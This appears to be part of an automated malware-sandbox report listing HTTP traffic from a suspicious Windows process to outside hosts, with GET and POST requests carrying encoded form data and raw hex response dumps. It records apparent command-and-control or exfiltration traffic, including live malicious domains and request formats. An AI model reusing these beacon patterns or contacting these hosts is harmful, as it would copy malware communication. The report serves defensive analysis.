                                                                  Data Ascii: EZ2lo=sjFacnSUxL2BFrJM3g+LT7OhAr7tfeli9fbSSA2KtWp1Mh0uKMKDcMiEkkzo+w7vgaFQB/rIzE5NQtaugt3Qy1RLCyA7M5Iy+cEcabHklN2H9mYL8P5NGZzU2N9xltWSj2idil+1y8n+EsZWRyrtO4SvSsV7S/6AFAPtwFfhU20Rt5vnyP5mXUm6MDmnFy+lOg9zvJn/WvQFt2iwHvBfpd+Xhk/N5C6X+9IUBnjTqy18NAxC/u/mTZ+gV7HjlHZ7Cm1eda3Jkf0IrVXPrThR4TkFQpDZqbYIsGYRCBGU6XZkH9NY3hHrJbnsw1u1Pt1334FMJeRxbY4Ms/+Jxr7SJwvFde7as6FUJcaV/p3rpahB9kPLMHweB+o3L3GVAVzZYeSZ6/T8r3kUV7ba4TTcPTsM3LMkY7saImAriM4YBl1sxK5CJIiOeLjAkiL9Pmyt4U6+opfXCjH1+Xb2D62qeHsSMuunVWGqiMMIPoXX1HB6Qo6wdVa3xDM2J7Xwse34/nnYUZ33dU0LjarSC0DP0LEb87A64GfK3dGUS7k7c/v8mkXV3D8mgBwr6H/e0LeFyOiMZoGkpqADWCr8d6JVLS1q7mFau1mngYMUqgJ3weq6CyBNz1fM4cFCiJpH4FHdJ0lZqHcZV/KZ7ExLCSAM6EWgioBnfu9eiKFq++53lI53RAgCI1iFyEXJ/RbaWz67tfAPBcI+zC1AyWAvYXpgRX5FoT1vJg2NL6zOaZsRWVqQl9Do2lSz6kWGHWMKxFxk5+xfYv4BYDm9VDYtInK4Ua8p3o2FL9KUcLNnUYg8gCz+cNdUFL97orCLUTPT8mViGkiSxkMykwAaE0cTWTtrqIqD5wFz85ttE/ZvySibpBFMAVVIZMZCmP+jf0MpnVMklz/yo1BQsxvta2Vit4XGt4HRN+j8lR1P632IPyqBqhHZvWoV9Es9Oyu5KOtucRKHsPYFDCuI33glxJg2GIR2Hb7P8OEci8TVGuU8M6TIGmwQnO [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.1050012172.81.61.224806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:40:53.214644909 CEST518OUTGET /vjif/?7NP=7FXXUPl&EZ2lo=hht6fXzVtrW5d+NPng+JG5iJCe7TavNe5+XwDzPis3heMTZrctTYWOKh4nmo+xDjprJSB+HPmC1WRNqnme2dwnVwPjNhKroV7fgYGIXE7NS2qGE/9Q== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.moritynomxd.xyz
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.1050013194.58.112.174806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:41:19.722125053 CEST800OUTPOST /1yii/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.albero-dveri.online
                                                                  Origin: http://www.albero-dveri.online
                                                                  Referer: http://www.albero-dveri.online/1yii/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 66 35 55 57 33 76 46 61 52 4a 75 70 6f 77 79 57 76 55 74 69 58 38 61 4e 72 44 4e 70 73 41 56 6c 59 77 63 4f 74 48 53 61 76 4c 64 41 50 6c 63 57 4f 34 4e 68 56 69 72 53 6f 48 76 75 36 53 49 43 34 47 63 70 45 2b 55 4f 54 69 54 76 71 64 53 43 67 6a 39 6a 69 4c 69 61 6a 4f 62 4c 72 4b 70 7a 45 6c 50 36 68 47 63 43 65 6b 33 54 46 7a 39 69 53 44 70 73 32 68 41 4a 50 53 67 4f 34 38 6e 69 57 50 43 54 64 4b 54 30 6c 58 4c 69 4b 43 4a 67 37 49 51 6e 75 39 66 4b 51 79 54 44 71 44 47 33 78 49 41 4a 4c 79 55 33 59 42 6e 4b 74 76 4e 51 73 67 39 4d 44 4b 4e 48 55 62 4c 43
                                                                  Data Ascii: EZ2lo=f5UW3vFaRJupowyWvUtiX8aNrDNpsAVlYwcOtHSavLdAPlcWO4NhVirSoHvu6SIC4GcpE+UOTiTvqdSCgj9jiLiajObLrKpzElP6hGcCek3TFz9iSDps2hAJPSgO48niWPCTdKT0lXLiKCJg7IQnu9fKQyTDqDG3xIAJLyU3YBnKtvNQsg9MDKNHUbLC
                                                                  Oct 7, 2024 10:41:20.404263973 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:41:20 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                  Oct 7, 2024 10:41:20.404309988 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                                                  Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                                                                  Oct 7, 2024 10:41:20.404362917 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                                                                  Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                                                                  Oct 7, 2024 10:41:20.404393911 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                                                                  Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.1050014194.58.112.174806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:41:22.261383057 CEST824OUTPOST /1yii/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.albero-dveri.online
                                                                  Origin: http://www.albero-dveri.online
                                                                  Referer: http://www.albero-dveri.online/1yii/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 66 35 55 57 33 76 46 61 52 4a 75 70 79 54 36 57 6a 56 74 69 47 4d 61 4b 79 44 4e 70 6e 67 56 68 59 77 51 4f 74 47 6d 4b 76 65 31 41 4f 45 73 57 4e 35 4e 68 62 43 72 53 67 6e 76 68 33 79 49 2f 34 47 59 62 45 2f 6f 4f 54 69 58 76 71 63 4f 43 67 77 46 67 69 62 69 59 34 2b 62 4a 6c 71 70 7a 45 6c 50 36 68 47 4a 6e 65 6b 76 54 46 43 4e 69 44 57 56 72 31 68 41 49 4b 53 67 4f 75 4d 6e 6d 57 50 44 32 64 4c 50 65 6c 56 6a 69 4b 44 35 67 31 35 51 67 6e 39 66 4d 65 53 53 67 37 44 76 77 35 6f 63 73 52 68 41 4d 49 54 47 71 75 4f 73 58 39 78 63 62 51 39 52 4a 61 64 2b 6f 50 5a 57 4b 52 4b 77 6d 4e 6a 62 2f 39 51 4c 66 5a 2f 53 42 39 67 3d 3d
                                                                  Data Ascii: EZ2lo=f5UW3vFaRJupyT6WjVtiGMaKyDNpngVhYwQOtGmKve1AOEsWN5NhbCrSgnvh3yI/4GYbE/oOTiXvqcOCgwFgibiY4+bJlqpzElP6hGJnekvTFCNiDWVr1hAIKSgOuMnmWPD2dLPelVjiKD5g15Qgn9fMeSSg7Dvw5ocsRhAMITGquOsX9xcbQ9RJad+oPZWKRKwmNjb/9QLfZ/SB9g==
                                                                  Oct 7, 2024 10:41:22.943185091 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:41:22 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                  Oct 7, 2024 10:41:22.943214893 CEST224INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                                                  Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw
                                                                  Oct 7, 2024 10:41:22.943233967 CEST1236INData Raw: e7 a0 85 fe 27 f9 10 2b da 89 1f 40 b6 5d 2c 04 8b 48 6e 0b ca 74 d2 02 e4 3e ec 98 69 05 c5 50 5a f0 0e fe 3f a0 35 66 c1 15 1a 48 3e 61 2d b0 2f 43 4b f1 77 50 0b da fe f0 eb fd 37 e6 26 6b 30 18 0f 5a ed 9f 92 cf 53 b3 de 63 6b a6 cb 64 12 da
                                                                  Data Ascii: '+@],Hnt>iPZ?5fH>a-/CKwP7&k0ZSckd!XL?"{c}Z@JvQ|`k}^YaeiZY&J>2JosBuEi)+]mC\,lp#SQo\Zr<SSO4#GmW
                                                                  Oct 7, 2024 10:41:22.943254948 CEST1128INData Raw: 72 93 ef 2b 71 4f 81 9b 85 aa 98 6e 44 ed 03 85 a3 39 6f 65 aa f3 f5 23 53 5f 27 63 e1 9e a3 e5 74 e6 8e b3 29 03 41 37 03 21 ae 5e 71 07 3e 1a e0 22 ca fc dd 48 05 e3 35 e5 82 fd fd e0 9c eb 56 44 59 96 45 75 7a 36 92 62 c3 0f 20 2f 8d e1 a0 ff
                                                                  Data Ascii: r+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41\;%Ey_r|](7TsK3;W>e=!N,k h_/|$R0`W*2vntp__7Rv


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.1050015194.58.112.174806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:41:24.806813002 CEST1837OUTPOST /1yii/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.albero-dveri.online
                                                                  Origin: http://www.albero-dveri.online
                                                                  Referer: http://www.albero-dveri.online/1yii/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 66 35 55 57 33 76 46 61 52 4a 75 70 79 54 36 57 6a 56 74 69 47 4d 61 4b 79 44 4e 70 6e 67 56 68 59 77 51 4f 74 47 6d 4b 76 65 74 41 50 33 30 57 50 65 52 68 59 43 72 53 6a 6e 76 69 33 79 49 59 34 43 4d 66 45 2f 6b 65 54 68 6a 76 72 2b 71 43 33 78 46 67 33 72 69 59 6e 4f 62 4b 72 4b 6f 70 45 6c 65 7a 68 47 5a 6e 65 6b 76 54 46 42 56 69 44 44 70 72 35 42 41 4a 50 53 67 53 34 38 6d 35 57 50 61 4c 64 49 6a 6b 6c 46 44 69 4b 67 42 67 34 72 49 67 6f 39 66 4f 64 53 53 47 37 44 7a 2f 35 6f 51 57 52 69 63 6d 49 51 57 71 2b 72 78 34 6c 46 59 78 54 73 6c 52 58 65 4b 51 4c 4e 32 32 52 37 6c 47 61 7a 2f 6d 6d 6a 6a 49 53 63 6e 52 6a 6f 38 4f 4e 57 6a 4c 54 50 74 32 6b 63 41 4e 42 6b 64 50 4c 75 2f 34 65 52 4a 77 43 54 31 46 7a 34 4b 31 43 78 4e 4f 44 48 37 6a 33 47 6b 6b 4e 53 65 73 76 78 39 35 31 58 75 47 45 50 4c 4e 76 67 65 63 72 75 5a 36 4f 69 67 38 45 69 39 38 54 4f 72 69 6b 4e 4b 73 53 43 67 30 69 52 67 6e 4a 50 71 4c 61 4d 39 69 30 39 53 4a 66 49 48 62 35 59 41 49 49 69 72 44 33 4f 56 4e [TRUNCATED]
                                                                  Data Ascii: EZ2lo=f5UW3vFaRJupyT6WjVtiGMaKyDNpngVhYwQOtGmKvetAP30WPeRhYCrSjnvi3yIY4CMfE/keThjvr+qC3xFg3riYnObKrKopElezhGZnekvTFBViDDpr5BAJPSgS48m5WPaLdIjklFDiKgBg4rIgo9fOdSSG7Dz/5oQWRicmIQWq+rx4lFYxTslRXeKQLN22R7lGaz/mmjjIScnRjo8ONWjLTPt2kcANBkdPLu/4eRJwCT1Fz4K1CxNODH7j3GkkNSesvx951XuGEPLNvgecruZ6Oig8Ei98TOrikNKsSCg0iRgnJPqLaM9i09SJfIHb5YAIIirD3OVN7PT5GGP1PyBow+dbdWz6ZkV3S+eDECiGIm29Dc4aqRTABD4GaUWAJxst3uW7A9dBMRjK79BxAHAp9qKjQQpOgRLZXNg2zKTBc74AXypKUs8YZxKbV33rUsbnL1IsM10MUM9tXwr6kjLS6hUkcZFH6oVmRjnZ1F/CpuFqRXlL4584si/SboLwNXKG4ncMl3AgpK5hIlC+IiIqw06bUgXcLZKq+ZsVsrxaIuYeiqYCadIx+Rzbrcx3g9xamCmKOumXyDomBf2B7IY8HZa8QrfJXLYsg2N9EQwzhOjGS61m6oCgAOIIbjF+TmC0NGGdUimlijdYDZCwMc/WeaF86SMBHT0twD+dnxc2edOjb01D0J3nGbpV8bEzyfeVjSsAOokxgcOTCCUPaE4YA3v9YM0muPFc0Vvxns29Uuq7oWnrkERBkKsTOKCGRvAYJSl2YSvTwAeXsye4HZ5DW5z/HxkQHKRcxCT8R2YmSVgL7bAzq7iIXo4gbXpCyi2K1UFdaHKEz6bY8eTbhdg1XTXf8LErSn14ZDRAyXEwDmzX/XgGBJ3KIG2dLqfwgFGgxnhyw7JV3w67wkmAfFkhC3KPCalSK2cU+eMhhu1sa/k5lZc9RRMtdE/NaPf0kx6wHsXDI11T2KRmzfLGMhrT7BDKZw86+SKkLE1VA6KR8h [TRUNCATED]
                                                                  Oct 7, 2024 10:41:25.484146118 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:41:25 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                                  Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                                  Oct 7, 2024 10:41:25.484174013 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                                                  Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                                                                  Oct 7, 2024 10:41:25.484194040 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                                                                  Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                                                                  Oct 7, 2024 10:41:25.484206915 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                                                                  Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.1050016194.58.112.174806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:41:27.351933002 CEST522OUTGET /1yii/?EZ2lo=S7820Y1cJZfxr22K40lVRI+qrmhalVt3Xj4gyHqd7MQTNmhmHaxoWGfNrnng7EIbxAFiJvsMf3T0ofXi1SEumpqeoP3XzrB7Dn3j9lk1UX6QYnk/Rw==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.albero-dveri.online
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:41:28.052274942 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:41:27 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 